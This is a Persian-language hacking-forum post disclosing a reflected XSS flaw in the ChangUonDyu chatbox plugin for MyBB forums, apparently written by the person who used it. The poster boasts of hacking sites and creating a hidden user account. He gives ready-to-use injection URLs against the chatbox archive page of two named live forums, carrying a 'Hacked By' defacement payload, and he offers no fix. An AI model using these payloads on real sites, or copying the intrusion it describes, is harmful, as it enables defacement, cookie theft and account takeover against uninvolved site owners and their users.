امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5

بسیار مهم> ChangUonDyu Chatbox Plugin XSS<

#1
لام و درود





دیگه از عنوان معلومه میخوام چی بگم بنده چندروز پیش داشتم چندتا تارگت رو تست میزدم انجمن مای بی بی بودند بسیار مهم> ChangUonDyu Chatbox Plugin XSS< 1 





باگ XSS هس در قسمت چت باکس مای بی بی و اسم پلاگین هم ChangUonDyu





که میشه با هایجکت کوکی ها یوزر و پسورد رو خوند و دیفیس(هک) کرد که تیم امنیتی مسیح تیم هم این باگ رو داشت که بنده برای خودم یه یوزر مخفی ساختم و.....  بسیار مهم> ChangUonDyu Chatbox Plugin XSS< 1



======================================



اگه به آدرس زیر برید بسیار مهم> ChangUonDyu Chatbox Plugin XSS< 1 و این سایت رو Hک کردم که خودشون گفتن که سایتشون Hک شده بود





کد php:

کد:
http://forum.tahaquran.ir/chatbox/archive.php?page=13 




نمونه ای از آسیب پذیری:





کد php:

کد:
http://forum.tahaquran.ir/chatbox/archive.php?page=%3Cmarquee%3EHacked%20By%20EbRaHiM-VaKeR%3C/marquee%3E 


کد php:

کد:
http://mihan-forum.ir/chatbox/archive.php?page=%3Cmarquee%3EHacked%20By%20EbRaHiM-VaKeR%3C/marquee%3E 






متاسفانه بنده راه پچ این باگ رو بلد نیستم واگر نه راه پیشگیری رو میزاشتم
پاسخ
آگهی


[-]
به اشتراک گذاری/بوکمارک (نمایش همه)
google Facebook cloob Twitter
برای ارسال نظر وارد حساب کاربری خود شوید یا ثبت نام کنید
شما جهت ارسال نظر در مطلب نیازمند عضویت در این انجمن هستید
ایجاد حساب کاربری
ساخت یک حساب کاربری شخصی در انجمن ما. این کار بسیار آسان است!
یا
ورود
از قبل حساب کاربری دارید? از اینجا وارد شوید.


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان